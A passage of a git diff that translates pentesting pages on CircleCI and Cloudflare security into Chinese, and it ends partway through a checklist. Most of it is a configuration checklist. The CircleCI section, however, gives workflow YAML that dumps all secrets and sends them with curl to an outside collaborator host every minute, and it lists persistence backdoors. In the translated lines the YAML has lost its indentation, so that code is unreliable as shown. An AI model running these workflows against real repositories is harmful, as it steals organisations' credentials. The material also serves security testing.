command: | - SECRET="A secret" - echo $SECRET +name: "set and echo" +command: | +SECRET="A secret" +echo $SECRET ``` - -You can declare them in clear text inside the **run environment**: - +您可以在 **run environment** 中以明文声明它们: ```yaml - run: - name: "set and echo" - command: echo $SECRET - environment: - SECRET: A secret +name: "set and echo" +command: echo $SECRET +environment: +SECRET: A secret ``` - -You can declare them in clear text inside the **build-job environment**: - +您可以在 **build-job environment** 中以明文声明它们: ```yaml jobs: - build-job: - docker: - - image: cimg/base:2020.01 - environment: - SECRET: A secret +build-job: +docker: +- image: cimg/base:2020.01 +environment: +SECRET: A secret ``` - -You can declare them in clear text inside the **environment of a container**: - +您可以在 **容器的环境** 中以明文声明它们: ```yaml jobs: - build-job: - docker: - - image: cimg/base:2020.01 - environment: - SECRET: A secret +build-job: +docker: +- image: cimg/base:2020.01 +environment: +SECRET: A secret ``` +#### 项目秘密 -#### Project Secrets - -These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\ -You can see them **declared in** _https://app.circleci.com/settings/project/github/\/\/environment-variables_ +这些是**秘密**,只有**项目**(通过**任何分支**)可以**访问**。\ +您可以在 _https://app.circleci.com/settings/project/github/\/\/environment-variables_ 中查看它们的**声明**。 ![](<../images/image (129).png>) > [!CAUTION] -> The "**Import Variables**" functionality allows to **import variables from other projects** to this one. +> "**导入变量**" 功能允许从其他项目**导入变量**到这个项目。 -#### Context Secrets +#### 上下文秘密 -These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here: +这些是**组织范围内**的秘密。默认情况下,**任何仓库**都可以**访问**存储在这里的任何秘密: ![](<../images/image (123).png>) > [!TIP] -> However, note that a different group (instead of All members) can be **selected to only give access to the secrets to specific people**.\ -> This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people. +> 但是,请注意,可以选择不同的组(而不是所有成员)来**仅向特定人员提供秘密的访问权限**。\ +> 这目前是**提高秘密安全性**的最佳方法之一,不允许所有人访问,而只是一些人。 -### Attacks +### 攻击 -#### Search Clear Text Secrets +#### 搜索明文秘密 -If you have **access to the VCS** (like github) check the file `.circleci/config.yml` of **each repo on each branch** and **search** for potential **clear text secrets** stored in there. +如果您有**访问VCS**(如github),请检查**每个仓库每个分支**的文件 `.circleci/config.yml` 并**搜索**潜在的**明文秘密**。 -#### Secret Env Vars & Context enumeration +#### 秘密环境变量和上下文枚举 -Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\/contexts_. +检查代码,您可以找到在每个 `.circleci/config.yml` 文件中**使用**的**所有秘密名称**。您还可以从这些文件中获取**上下文名称**,或在网页控制台中查看:_https://app.circleci.com/settings/organization/github/\/contexts_。 -#### Exfiltrate Project secrets +#### 外泄项目秘密 > [!WARNING] -> In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_). +> 为了**外泄所有**项目和上下文的**秘密**,您**只需**对整个github组织中的**1个仓库**拥有**写入**权限(_并且您的账户必须有访问上下文的权限,但默认情况下每个人都可以访问每个上下文_)。 > [!CAUTION] -> The "**Import Variables**" functionality allows to **import variables from other projects** to this one. Therefore, an attacker could **import all the project variables from all the repos** and then **exfiltrate all of them together**. - -All the project secrets always are set in the env of the jobs, so just calling env and obfuscating it in base64 will exfiltrate the secrets in the **workflows web log console**: +> "**导入变量**" 功能允许从其他项目**导入变量**到这个项目。因此,攻击者可以**导入所有仓库的所有项目变量**,然后**一起外泄所有变量**。 +所有项目秘密始终在作业的环境中设置,因此只需调用环境并将其混淆为base64,就会在**工作流网页日志控制台**中外泄秘密: ```yaml version: 2.1 jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - run: - name: "Exfil env" - command: "env | base64" +exfil-env: +docker: +- image: cimg/base:stable +steps: +- checkout +- run: +name: "Exfil env" +command: "env | base64" workflows: - exfil-env-workflow: - jobs: - - exfil-env +exfil-env-workflow: +jobs: +- exfil-env ``` - -If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **create a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**: - +如果您**无法访问网络控制台**,但您有**对代码库的访问权限**并且知道使用了CircleCI,您可以**创建一个工作流**,该工作流**每分钟触发一次**并且**将秘密导出到外部地址**: ```yaml version: 2.1 jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - run: - name: "Exfil env" - command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`" +exfil-env: +docker: +- image: cimg/base:stable +steps: +- checkout +- run: +name: "Exfil env" +command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`" # I filter by the repo branch where this config.yaml file is located: circleci-project-setup workflows: - exfil-env-workflow: - triggers: - - schedule: - cron: "* * * * *" - filters: - branches: - only: - - circleci-project-setup - jobs: - - exfil-env +exfil-env-workflow: +triggers: +- schedule: +cron: "* * * * *" +filters: +branches: +only: +- circleci-project-setup +jobs: +- exfil-env ``` +#### 导出上下文秘密 -#### Exfiltrate Context Secrets - -You need to **specify the context name** (this will also exfiltrate the project secrets): - +您需要**指定上下文名称**(这也将导出项目秘密): ```yaml version: 2.1 jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - run: - name: "Exfil env" - command: "env | base64" +exfil-env: +docker: +- image: cimg/base:stable +steps: +- checkout +- run: +name: "Exfil env" +command: "env | base64" workflows: - exfil-env-workflow: - jobs: - - exfil-env: - context: Test-Context +exfil-env-workflow: +jobs: +- exfil-env: +context: Test-Context ``` - -If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **modify a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**: - +如果您**无法访问网络控制台**,但您有**对代码库的访问权限**并且知道使用了CircleCI,您可以**修改一个每分钟触发的工作流**,并且该工作流**将秘密导出到外部地址**: ```yaml version: 2.1 jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - run: - name: "Exfil env" - command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`" +exfil-env: +docker: +- image: cimg/base:stable +steps: +- checkout +- run: +name: "Exfil env" +command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`" # I filter by the repo branch where this config.yaml file is located: circleci-project-setup workflows: - exfil-env-workflow: - triggers: - - schedule: - cron: "* * * * *" - filters: - branches: - only: - - circleci-project-setup - jobs: - - exfil-env: - context: Test-Context +exfil-env-workflow: +triggers: +- schedule: +cron: "* * * * *" +filters: +branches: +only: +- circleci-project-setup +jobs: +- exfil-env: +context: Test-Context ``` - > [!WARNING] -> Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**. +> 仅仅在一个仓库中创建一个新的 `.circleci/config.yml` **并不足以触发 circleci 构建**。你需要在 **circleci 控制台中将其启用为项目**。 -#### Escape to Cloud +#### 逃往云端 -**CircleCI** gives you the option to run **your builds in their machines or in your own**.\ -By default their machines are located in GCP, and you initially won't be able to fid anything relevant. However, if a victim is running the tasks in **their own machines (potentially, in a cloud env)**, you might find a **cloud metadata endpoint with interesting information on it**. - -Notice that in the previous examples it was launched everything inside a docker container, but you can also **ask to launch a VM machine** (which may have different cloud permissions): +**CircleCI** 让你可以选择在 **他们的机器上或你自己的机器上运行构建**。\ +默认情况下,他们的机器位于 GCP,你最初无法找到任何相关信息。然而,如果受害者在 **他们自己的机器上(可能是在云环境中)** 运行任务,你可能会找到一个 **包含有趣信息的云元数据端点**。 +请注意,在之前的示例中,一切都是在 docker 容器内启动的,但你也可以 **请求启动一台虚拟机**(这可能具有不同的云权限): ```yaml jobs: - exfil-env: - #docker: - # - image: cimg/base:stable - machine: - image: ubuntu-2004:current +exfil-env: +#docker: +# - image: cimg/base:stable +machine: +image: ubuntu-2004:current ``` - -Or even a docker container with access to a remote docker service: - +或者甚至是一个可以访问远程 docker 服务的 docker 容器: ```yaml jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - setup_remote_docker: - version: 19.03.13 +exfil-env: +docker: +- image: cimg/base:stable +steps: +- checkout +- setup_remote_docker: +version: 19.03.13 ``` +#### 持久性 -#### Persistence - -- It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access. - - _https://app.circleci.com/settings/user/tokens_ -- It's possible to **create projects tokens** to access the project with the permissions given to the token. - - _https://app.circleci.com/settings/project/github/\/\/api_ -- It's possible to **add SSH keys** to the projects. - - _https://app.circleci.com/settings/project/github/\/\/ssh_ -- It's possible to **create a cron job in hidden branch** in an unexpected project that is **leaking** all the **context env** vars everyday. - - Or even create in a branch / modify a known job that will **leak** all context and **projects secrets** everyday. -- If you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor** -- You can find a **command injection vulnerability** in some task and **inject commands** via a **secret** modifying its value +- 可以在 CircleCI 中 **创建** **用户令牌** 以使用用户的访问权限访问 API 端点。 +- _https://app.circleci.com/settings/user/tokens_ +- 可以 **创建项目令牌** 以使用令牌授予的权限访问项目。 +- _https://app.circleci.com/settings/project/github/\/\/api_ +- 可以 **向项目添加 SSH 密钥**。 +- _https://app.circleci.com/settings/project/github/\/\/ssh_ +- 可以在一个意外的项目中 **创建一个隐藏分支的 cron 作业**,每天 **泄露** 所有 **上下文环境** 变量。 +- 或者甚至在一个分支中创建/修改一个已知的作业,每天 **泄露** 所有上下文和 **项目机密**。 +- 如果你是 GitHub 的所有者,你可以 **允许未验证的 orbs** 并在作业中将其配置为 **后门**。 +- 你可以在某些任务中找到 **命令注入漏洞** 并通过 **秘密** 修改其值来 **注入命令**。 {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/cloudflare-security/README.md b/src/pentesting-ci-cd/cloudflare-security/README.md index 77d2c2c50..ac8255488 100644 --- a/src/pentesting-ci-cd/cloudflare-security/README.md +++ b/src/pentesting-ci-cd/cloudflare-security/README.md @@ -2,13 +2,13 @@ {{#include ../../banners/hacktricks-training.md}} -In a Cloudflare account there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** +在 Cloudflare 账户中,有一些 **常规设置和服务** 可以配置。在本页面中,我们将 **分析每个部分与安全相关的设置:**
## Websites -Review each with: +逐一检查: {{#ref}} cloudflare-domains.md @@ -16,9 +16,9 @@ cloudflare-domains.md ### Domain Registration -- [ ] In **`Transfer Domains`** check that it's not possible to transfer any domain. +- [ ] 在 **`Transfer Domains`** 中检查是否无法转移任何域名。 -Review each with: +逐一检查: {{#ref}} cloudflare-domains.md @@ -26,39 +26,39 @@ cloudflare-domains.md ## Analytics -_I couldn't find anything to check for a config security review._ +_我找不到任何可以检查配置安全审查的内容。_ ## Pages -On each Cloudflare's page: +在每个 Cloudflare 页面上: -- [ ] Check for **sensitive information** in the **`Build log`**. -- [ ] Check for **sensitive information** in the **Github repository** assigned to the pages. -- [ ] Check for potential github repo compromise via **workflow command injection** or `pull_request_target` compromise. More info in the [**Github Security page**](../github-security/). -- [ ] Check for **vulnerable functions** in the `/fuctions` directory (if any), check the **redirects** in the `_redirects` file (if any) and **misconfigured headers** in the `_headers` file (if any). -- [ ] Check for **vulnerabilities** in the **web page** via **blackbox** or **whitebox** if you can **access the code** -- [ ] In the details of each page `//pages/view/blocklist/settings/functions`. Check for **sensitive information** in the **`Environment variables`**. -- [ ] In the details page check also the **build command** and **root directory** for **potential injections** to compromise the page. +- [ ] 检查 **`Build log`** 中的 **敏感信息**。 +- [ ] 检查分配给页面的 **Github 仓库** 中的 **敏感信息**。 +- [ ] 检查通过 **workflow command injection** 或 `pull_request_target` 可能导致的 GitHub 仓库泄露。更多信息请参见 [**Github Security page**](../github-security/)。 +- [ ] 检查 `/fuctions` 目录中的 **脆弱函数**(如果有),检查 `_redirects` 文件中的 **重定向**(如果有)和 `_headers` 文件中的 **错误配置的头部**(如果有)。 +- [ ] 通过 **blackbox** 或 **whitebox** 检查 **网页** 中的 **漏洞**,如果您可以 **访问代码**。 +- [ ] 在每个页面的详细信息 `//pages/view/blocklist/settings/functions` 中,检查 **`Environment variables`** 中的 **敏感信息**。 +- [ ] 在详细信息页面中,还要检查 **构建命令** 和 **根目录** 以查找 **潜在注入** 以危害页面。 ## **Workers** -On each Cloudflare's worker check: +在每个 Cloudflare 的 worker 中检查: -- [ ] The triggers: What makes the worker trigger? Can a **user send data** that will be **used** by the worker? -- [ ] In the **`Settings`**, check for **`Variables`** containing **sensitive information** -- [ ] Check the **code of the worker** and search for **vulnerabilities** (specially in places where the user can manage the input) - - Check for SSRFs returning the indicated page that you can control - - Check XSSs executing JS inside a svg image - - It is possible that the worker interacts with other internal services. For example, a worker may interact with a R2 bucket storing information in it obtained from the input. In that case, it would be necessary to check what capabilities does the worker have over the R2 bucket and how could it be abused from the user input. +- [ ] 触发器:是什么使 worker 触发?用户是否可以发送将被 worker **使用** 的数据? +- [ ] 在 **`Settings`** 中,检查包含 **敏感信息** 的 **`Variables`**。 +- [ ] 检查 **worker 的代码** 并搜索 **漏洞**(特别是在用户可以管理输入的地方)。 +- 检查 SSRFs 返回您可以控制的指定页面 +- 检查在 svg 图像内执行 JS 的 XSS +- worker 可能与其他内部服务交互。例如,worker 可能与 R2 存储桶交互,从输入中获取信息。在这种情况下,需要检查 worker 对 R2 存储桶的权限以及如何可能被用户输入滥用。 > [!WARNING] -> Note that by default a **Worker is given a URL** such as `..workers.dev`. The user can set it to a **subdomain** but you can always access it with that **original URL** if you know it. +> 请注意,默认情况下,**Worker 会被赋予一个 URL**,例如 `..workers.dev`。用户可以将其设置为 **子域名**,但如果您知道该 **原始 URL**,则始终可以通过该 URL 访问它。 ## R2 -On each R2 bucket check: +在每个 R2 存储桶中检查: -- [ ] Configure **CORS Policy**. +- [ ] 配置 **CORS 策略**。 ## Stream @@ -70,8 +70,8 @@ TODO ## Security Center -- [ ] If possible, run a **`Security Insights`** **scan** and an **`Infrastructure`** **scan**, as they will **highlight** interesting information **security** wise. -- [ ] Just **check this information** for security misconfigurations and interesting info +- [ ] 如果可能,运行 **`Security Insights`** **扫描** 和 **`Infrastructure`** **扫描**,因为它们将 **突出** 有趣的信息 **安全** 方面。 +- [ ] 仅检查此信息以查找安全错误配置和有趣的信息 ## Turnstile @@ -86,53 +86,49 @@ cloudflare-zero-trust-network.md ## Bulk Redirects > [!NOTE] -> Unlike [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) are essentially static — they do **not support any string replacement** operations or regular expressions. However, you can configure URL redirect parameters that affect their URL matching behavior and their runtime behavior. +> 与 [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/) 不同, [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) 本质上是静态的——它们不支持任何字符串替换操作或正则表达式。但是,您可以配置影响其 URL 匹配行为和运行时行为的 URL 重定向参数。 -- [ ] Check that the **expressions** and **requirements** for redirects **make sense**. -- [ ] Check also for **sensitive hidden endpoints** that you contain interesting info. +- [ ] 检查 **重定向的表达式** 和 **要求** 是否 **合理**。 +- [ ] 还要检查是否存在包含有趣信息的 **敏感隐藏端点**。 ## Notifications -- [ ] Check the **notifications.** These notifications are recommended for security: - - `Usage Based Billing` - - `HTTP DDoS Attack Alert` - - `Layer 3/4 DDoS Attack Alert` - - `Advanced HTTP DDoS Attack Alert` - - `Advanced Layer 3/4 DDoS Attack Alert` - - `Flow-based Monitoring: Volumetric Attack` - - `Route Leak Detection Alert` - - `Access mTLS Certificate Expiration Alert` - - `SSL for SaaS Custom Hostnames Alert` - - `Universal SSL Alert` - - `Script Monitor New Code Change Detection Alert` - - `Script Monitor New Domain Alert` - - `Script Monitor New Malicious Domain Alert` - - `Script Monitor New Malicious Script Alert` - - `Script Monitor New Malicious URL Alert` - - `Script Monitor New Scripts Alert` - - `Script Monitor New Script Exceeds Max URL Length Alert` - - `Advanced Security Events Alert` - - `Security Events Alert` -- [ ] Check all the **destinations**, as there could be **sensitive info** (basic http auth) in webhook urls. Make also sure webhook urls use **HTTPS** - - [ ] As extra check, you could try to **impersonate a cloudflare notification** to a third party, maybe you can somehow **inject something dangerous** +- [ ] 检查 **通知**。这些通知建议用于安全: +- `Usage Based Billing` +- `HTTP DDoS Attack Alert` +- `Layer 3/4 DDoS Attack Alert` +- `Advanced HTTP DDoS Attack Alert` +- `Advanced Layer 3/4 DDoS Attack Alert` +- `Flow-based Monitoring: Volumetric Attack` +- `Route Leak Detection Alert` +- `Access mTLS Certificate Expiration Alert` +- `SSL for SaaS Custom Hostnames Alert` +- `Universal SSL Alert` +- `Script Monitor New Code Change Detection Alert` +- `Script Monitor New Domain Alert` +- `Script Monitor New Malicious Domain Alert` +- `Script Monitor New Malicious Script Alert` +- `Script Monitor New Malicious URL Alert` +- `Script Monitor New Scripts Alert` +- `Script Monitor New Script Exceeds Max URL Length Alert` +- `Advanced Security Events Alert` +- `Security Events Alert` +- [ ] 检查所有 **目标**,因为 webhook URL 中可能存在 **敏感信息**(基本 http 身份验证)。还要确保 webhook URL 使用 **HTTPS**。 +- [ ] 作为额外检查,您可以尝试 **冒充 Cloudflare 通知** 给第三方,也许您可以以某种方式 **注入一些危险的东西**。 ## Manage Account -- [ ] It's possible to see the **last 4 digits of the credit card**, **expiration** time and **billing address** in **`Billing` -> `Payment info`**. -- [ ] It's possible to see the **plan type** used in the account in **`Billing` -> `Subscriptions`**. -- [ ] In **`Members`** it's possible to see all the members of the account and their **role**. Note that if the plan type isn't Enterprise, only 2 roles exist: Administrator and Super Administrator. But if the used **plan is Enterprise**, [**more roles**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) can be used to follow the least privilege principle. - - Therefore, whenever possible is **recommended** to use the **Enterprise plan**. -- [ ] In Members it's possible to check which **members** has **2FA enabled**. **Every** user should have it enabled. +- [ ] 可以在 **`Billing` -> `Payment info`** 中查看 **信用卡的最后 4 位数字**、**到期** 时间和 **账单地址**。 +- [ ] 可以在 **`Billing` -> `Subscriptions`** 中查看账户中使用的 **计划类型**。 +- [ ] 在 **`Members`** 中,可以查看账户的所有成员及其 **角色**。请注意,如果计划类型不是企业版,则仅存在 2 个角色:管理员和超级管理员。但如果使用的 **计划是企业版**,则可以使用 [**更多角色**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) 来遵循最小权限原则。 +- 因此,建议在可能的情况下使用 **企业计划**。 +- [ ] 在成员中,可以检查哪些 **成员** 启用了 **2FA**。**每个** 用户都应该启用它。 > [!NOTE] -> Note that fortunately the role **`Administrator`** doesn't give permissions to manage memberships (**cannot escalate privs or invite** new members) +> 请注意,幸运的是,角色 **`Administrator`** 不授予管理成员资格的权限(**无法提升权限或邀请** 新成员)。 ## DDoS Investigation -[Check this part](cloudflare-domains.md#cloudflare-ddos-protection). +[检查此部分](cloudflare-domains.md#cloudflare-ddos-protection)。 {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md b/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md index 02989e685..fb24eb38f 100644 --- a/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md +++ b/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md @@ -2,31 +2,31 @@ {{#include ../../banners/hacktricks-training.md}} -In each TLD configured in Cloudflare there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** +在 Cloudflare 配置的每个 TLD 中,有一些 **常规设置和服务** 可以配置。在本页面中,我们将 **分析每个部分的安全相关设置:**
-### Overview +### 概述 -- [ ] Get a feeling of **how much** are the services of the account **used** -- [ ] Find also the **zone ID** and the **account ID** +- [ ] 了解账户 **服务的使用程度** +- [ ] 还要找到 **区域 ID** 和 **账户 ID** -### Analytics +### 分析 -- [ ] In **`Security`** check if there is any **Rate limiting** +- [ ] 在 **`安全`** 中检查是否有 **速率限制** ### DNS -- [ ] Check **interesting** (sensitive?) data in DNS **records** -- [ ] Check for **subdomains** that could contain **sensitive info** just based on the **name** (like admin173865324.domin.com) -- [ ] Check for web pages that **aren't** **proxied** -- [ ] Check for **proxified web pages** that can be **accessed directly** by CNAME or IP address -- [ ] Check that **DNSSEC** is **enabled** -- [ ] Check that **CNAME Flattening** is **used** in **all CNAMEs** - - This is could be useful to **hide subdomain takeover vulnerabilities** and improve load timings -- [ ] Check that the domains [**aren't vulnerable to spoofing**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing) +- [ ] 检查 DNS **记录** 中的 **有趣**(敏感?)数据 +- [ ] 检查可能包含 **敏感信息** 的 **子域名**,仅基于 **名称**(如 admin173865324.domin.com) +- [ ] 检查 **未被代理** 的网页 +- [ ] 检查可以通过 CNAME 或 IP 地址 **直接访问的代理网页** +- [ ] 检查 **DNSSEC** 是否 **启用** +- [ ] 检查所有 **CNAME** 是否 **使用 CNAME 扁平化** +- 这可能有助于 **隐藏子域名接管漏洞** 并改善加载时间 +- [ ] 检查域名 [**是否易受欺骗**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing) -### **Email** +### **电子邮件** TODO @@ -36,91 +36,91 @@ TODO ### SSL/TLS -#### **Overview** +#### **概述** -- [ ] The **SSL/TLS encryption** should be **Full** or **Full (Strict)**. Any other will send **clear-text traffic** at some point. -- [ ] The **SSL/TLS Recommender** should be enabled +- [ ] **SSL/TLS 加密** 应该是 **完全** 或 **完全(严格)**。任何其他设置将在某些时候发送 **明文流量**。 +- [ ] **SSL/TLS 推荐器** 应该启用 -#### Edge Certificates +#### 边缘证书 -- [ ] **Always Use HTTPS** should be **enabled** -- [ ] **HTTP Strict Transport Security (HSTS)** should be **enabled** -- [ ] **Minimum TLS Version should be 1.2** -- [ ] **TLS 1.3 should be enabled** -- [ ] **Automatic HTTPS Rewrites** should be **enabled** -- [ ] **Certificate Transparency Monitoring** should be **enabled** +- [ ] **始终使用 HTTPS** 应该 **启用** +- [ ] **HTTP 严格传输安全 (HSTS)** 应该 **启用** +- [ ] **最低 TLS 版本应为 1.2** +- [ ] **TLS 1.3 应该启用** +- [ ] **自动 HTTPS 重写** 应该 **启用** +- [ ] **证书透明度监控** 应该 **启用** -### **Security** +### **安全** -- [ ] In the **`WAF`** section it's interesting to check that **Firewall** and **rate limiting rules are used** to prevent abuses. - - The **`Bypass`** action will **disable Cloudflare security** features for a request. It shouldn't be used. -- [ ] In the **`Page Shield`** section it's recommended to check that it's **enabled** if any page is used -- [ ] In the **`API Shield`** section it's recommended to check that it's **enabled** if any API is exposed in Cloudflare -- [ ] In the **`DDoS`** section it's recommended to enable the **DDoS protections** -- [ ] In the **`Settings`** section: - - [ ] Check that the **`Security Level`** is **medium** or greater - - [ ] Check that the **`Challenge Passage`** is 1 hour at max - - [ ] Check that the **`Browser Integrity Check`** is **enabled** - - [ ] Check that the **`Privacy Pass Support`** is **enabled** +- [ ] 在 **`WAF`** 部分,检查 **防火墙** 和 **速率限制规则是否被使用** 以防止滥用是很有趣的。 +- **`绕过`** 操作将 **禁用 Cloudflare 安全** 功能。它不应该被使用。 +- [ ] 在 **`页面保护`** 部分,如果使用了任何页面,建议检查其是否 **启用** +- [ ] 在 **`API 保护`** 部分,如果在 Cloudflare 中暴露了任何 API,建议检查其是否 **启用** +- [ ] 在 **`DDoS`** 部分,建议启用 **DDoS 保护** +- [ ] 在 **`设置`** 部分: +- [ ] 检查 **`安全级别`** 是否为 **中等** 或更高 +- [ ] 检查 **`挑战通行`** 最多为 1 小时 +- [ ] 检查 **`浏览器完整性检查`** 是否 **启用** +- [ ] 检查 **`隐私通行证支持`** 是否 **启用** -#### **CloudFlare DDoS Protection** +#### **CloudFlare DDoS 保护** -- If you can, enable **Bot Fight Mode** or **Super Bot Fight Mode**. If you protecting some API accessed programmatically (from a JS front end page for example). You might not be able to enable this without breaking that access. -- In **WAF**: You can create **rate limits by URL path** or to **verified bots** (Rate limiting rules), or to **block access** based on IP, Cookie, referrer...). So you could block requests that doesn't come from a web page or has a cookie. - - If the attack is from a **verified bot**, at least **add a rate limit** to bots. - - If the attack is to a **specific path**, as prevention mechanism, add a **rate limit** in this path. - - You can also **whitelist** IP addresses, IP ranges, countries or ASNs from the **Tools** in WAF. - - Check if **Managed rules** could also help to prevent vulnerability exploitations. - - In the **Tools** section you can **block or give a challenge to specific IPs** and **user agents.** -- In DDoS you could **override some rules to make them more restrictive**. -- **Settings**: Set **Security Level** to **High** and to **Under Attack** if you are Under Attack and that the **Browser Integrity Check is enabled**. -- In Cloudflare Domains -> Analytics -> Security -> Check if **rate limit** is enabled -- In Cloudflare Domains -> Security -> Events -> Check for **detected malicious Events** +- 如果可以,启用 **机器人战斗模式** 或 **超级机器人战斗模式**。如果您保护某个通过编程访问的 API(例如来自 JS 前端页面),您可能无法在不破坏该访问的情况下启用此功能。 +- 在 **WAF**:您可以根据 URL 路径创建 **速率限制** 或对 **已验证的机器人**(速率限制规则),或根据 IP、Cookie、引荐来源等 **阻止访问**。因此,您可以阻止不来自网页或没有 Cookie 的请求。 +- 如果攻击来自 **已验证的机器人**,至少 **添加速率限制** 到机器人。 +- 如果攻击针对 **特定路径**,作为预防机制,在该路径中添加 **速率限制**。 +- 您还可以在 WAF 的 **工具** 中 **白名单** IP 地址、IP 范围、国家或 ASN。 +- 检查 **托管规则** 是否也可以帮助防止漏洞利用。 +- 在 **工具** 部分,您可以 **阻止或对特定 IP 和用户代理发出挑战**。 +- 在 DDoS 中,您可以 **覆盖某些规则以使其更具限制性**。 +- **设置**:将 **安全级别** 设置为 **高**,如果您处于攻击中,则设置为 **正在攻击**,并确保 **浏览器完整性检查已启用**。 +- 在 Cloudflare Domains -> Analytics -> Security -> 检查 **速率限制** 是否启用 +- 在 Cloudflare Domains -> Security -> Events -> 检查 **检测到的恶意事件** -### Access +### 访问 {{#ref}} cloudflare-zero-trust-network.md {{#endref}} -### Speed +### 速度 -_I couldn't find any option related to security_ +_我找不到与安全相关的任何选项_ -### Caching +### 缓存 -- [ ] In the **`Configuration`** section consider enabling the **CSAM Scanning Tool** +- [ ] 在 **`配置`** 部分,考虑启用 **CSAM 扫描工具** -### **Workers Routes** +### **Workers 路由** -_You should have already checked_ [_cloudflare workers_](./#workers) +_您应该已经检查过_ [_cloudflare workers_](./#workers) -### Rules +### 规则 TODO -### Network +### 网络 -- [ ] If **`HTTP/2`** is **enabled**, **`HTTP/2 to Origin`** should be **enabled** -- [ ] **`HTTP/3 (with QUIC)`** should be **enabled** -- [ ] If the **privacy** of your **users** is important, make sure **`Onion Routing`** is **enabled** +- [ ] 如果 **`HTTP/2`** 已 **启用**,则 **`HTTP/2 到源`** 应该 **启用** +- [ ] **`HTTP/3 (带 QUIC)`** 应该 **启用** +- [ ] 如果 **用户** 的 **隐私** 重要,请确保 **`洋葱路由`** 已 **启用** -### **Traffic** +### **流量** TODO -### Custom Pages +### 自定义页面 -- [ ] It's optional to configure custom pages when an error related to security is triggered (like a block, rate limiting or I'm under attack mode) +- [ ] 当触发与安全相关的错误时(如阻止、速率限制或我正在攻击模式),配置自定义页面是可选的 -### Apps +### 应用 TODO -### Scrape Shield +### 抓取保护 -- [ ] Check **Email Address Obfuscation** is **enabled** -- [ ] Check **Server-side Excludes** is **enabled** +- [ ] 检查 **电子邮件地址模糊化** 是否 **启用** +- [ ] 检查 **服务器端排除** 是否 **启用** ### **Zaraz** @@ -131,7 +131,3 @@ TODO TODO {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md b/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md index 491ae7bc1..017a418de 100644 --- a/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md +++ b/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md @@ -2,43 +2,43 @@ {{#include ../../banners/hacktricks-training.md}} -In a **Cloudflare Zero Trust Network** account there are some **settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** +在 **Cloudflare Zero Trust Network** 账户中,有一些 **设置和服务** 可以进行配置。在本页面中,我们将 **分析每个部分的安全相关设置:**
### Analytics -- [ ] Useful to **get to know the environment** +- [ ] 有助于 **了解环境** ### **Gateway** -- [ ] In **`Policies`** it's possible to generate policies to **restrict** by **DNS**, **network** or **HTTP** request who can access applications. - - If used, **policies** could be created to **restrict** the access to malicious sites. - - This is **only relevant if a gateway is being used**, if not, there is no reason to create defensive policies. +- [ ] 在 **`Policies`** 中,可以生成策略以 **限制** 通过 **DNS**、**网络** 或 **HTTP** 请求谁可以访问应用程序。 +- 如果使用,**策略** 可以被创建以 **限制** 访问恶意网站。 +- 这 **仅在使用网关时相关**,如果不使用,则没有理由创建防御性策略。 ### Access #### Applications -On each application: +在每个应用程序上: -- [ ] Check **who** can access to the application in the **Policies** and check that **only** the **users** that **need access** to the application can access. - - To allow access **`Access Groups`** are going to be used (and **additional rules** can be set also) -- [ ] Check the **available identity providers** and make sure they **aren't too open** -- [ ] In **`Settings`**: - - [ ] Check **CORS isn't enabled** (if it's enabled, check it's **secure** and it isn't allowing everything) - - [ ] Cookies should have **Strict Same-Site** attribute, **HTTP Only** and **binding cookie** should be **enabled** if the application is HTTP. - - [ ] Consider enabling also **Browser rendering** for better **protection. More info about** [**remote browser isolation here**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**.** +- [ ] 